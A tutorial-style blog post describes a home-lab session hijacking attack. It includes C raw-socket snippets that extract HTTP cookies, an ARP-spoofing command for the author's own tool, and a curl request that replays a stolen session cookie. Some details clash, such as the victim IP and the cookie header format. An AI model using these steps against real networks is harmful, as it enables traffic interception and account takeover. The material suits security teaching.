2025-04-12 Stealing your cookies

Today we will be performing a session hijacking attack by stealing HTTP cookies, lets get started.

Step 1: Getting the cookies

When performing this attack, the first (and most obvious) thing we need to do is pick a target, intercept their traffic, and parse it for HTTP headers. We can then extract any information we want; in this case, we will take the cookie field.

Today I completed my newest tool, cookiemonSter. This tool will help us extract the cookies and hijack our target’s session.

With some help from this forum post we can make the following regex:

const char *pattern = "([A-Za-z0-9_\\-]+)=((\"[^\"]*\")|[^;\\s]*)";

Now that we have a pattern to match we need to start monitoring all of the traffic passing through the attacker. To do this we can simply setup a raw TCP socket

sock_raw = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));

Start to listen:

while (1) {    int data_size = recvfrom(sock_raw, buffer, sizeof(buffer), 0, &saddr, &saddr_size);

Create an IP struct to get the source and destination:

struct iphdr *ip = (struct iphdr *)(buffer + sizeof(struct ethhdr));

Then we can actually attempt to parse and print incoming headers with cookies:

uint16_t dport;
if (ip->protocol == IPPROTO_TCP) {

   if (data_size > 2){
       uint16_t dport = ntohs(tcp->dest);
       switch (dport) {
       case 80:
       case 443:
       case 8080:
       case 8443:

       if (strstr((const char *)payload, "Cookie:")) {
           printf("\n-------------------------------\n\n");

           printf("\n\n\033[1;34m[HTTP]\033[0m \033[1;32m%s\033[0m -> \033[1;31m%s\033[0m | Protocol: \033[1;33m%d\033[0m\n\n ",
src, dst, ip->protocol);

       parse_cookies(payload);
       }
    }
 }

}

Note

the source for all of these tools will be out soon in the 1.0 release.

Step 2: The attack

Now that we have a program that can intecept and parse HTTP headers lets start the attack.

As usual the victim in this simulation is my phone (10.0.0.155) and my laptop is the attacker (10.0.0.117)

Since almost every network in the world uses modern switches, we will have to perform an ARP spoofing attack to listen to my phone’s TCP communications. We can do this by running my tool, moriarty:

sudo moriarty  10.0.0.1 b8:1f:e1:23:41:ab 10.0.0.155 f0:44:a0:a1:73:63

This command will begin to spam ARP requests from “10.0.0.1” (The gateways IP) to 10.0.0.123 (my phone).

Once we run this we can run cookiemon aswell:

sudo cookiemonSter

Now to make testing this easy I will navigate to an HTTP site (Cookies can sometimes be exposed in HTTPS as well), if our monitor and ARP spoof is working we should see something like this:

_images/cookie_mon.jpg

When a user creates a session request.getSession() will be called; this is what creates the JSESSIONID object, which stores the session cookie. This is how websites identify and remember you; for example, if you are automatically logged in to Amazon every time you open your browser, you probably have one of these session cookies telling Amazon, “Hey, I’m me; you can log me in.” Now you might see where this causes issues… I just stole one with about 2 commands and 5 minutes of effort.

All I need to do now is put the JSESSIONID in an HTTP request; for example, I could run something like this:

curl -H "Cookie: D159FBE7E9FAD5C4DA9FDB8051AC5E47" http://unsecurewebsite.net/

Conclusion

Browser cookies are one of the most common targets for stealer malware and they aren’t hard to get. It is very important to be very cautious about which websites you allow cookies on.

I hope this post can help teach others how seemingly innocent features can be exploited and used in malicious ways.